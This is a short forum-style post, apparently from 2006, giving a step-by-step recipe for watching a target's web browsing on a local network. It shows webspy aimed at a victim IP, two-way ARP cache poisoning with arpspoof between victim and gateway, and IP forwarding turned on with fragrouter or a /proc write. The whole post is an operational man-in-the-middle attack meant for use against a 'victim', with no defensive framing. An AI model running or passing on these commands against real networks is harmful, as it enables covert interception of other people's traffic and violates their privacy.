Apr 11, 2006 19:44
To successfully use webspy, you need to be able to sniff the targets web traffic. If you are on a hub, just start webspy:
webspy -i eth0 192.168.1.5
where the IP address is the target.
If you are on a switched network, you will need to do ARP cache poisoning to redirect traffic through your interface.
arpspoof -t victimIP gatewayIP
arpspoof -t gatewayIP victimIP
Obviousy replay gatewayIP with the default gateways IP address and victimIP with the victims IP address. there are plenty of other tools to do this, but this one is the simplest to use.
You need to enable IP forwarding on your machine to put the victims packets back onto the network.
Fragrouter is the easiest for this:
fragrouter -B1
Or you could do:
echo 1 > /proc/sys/net/ipv4/ip_forward
Then set up webspy and open a web browser of your own.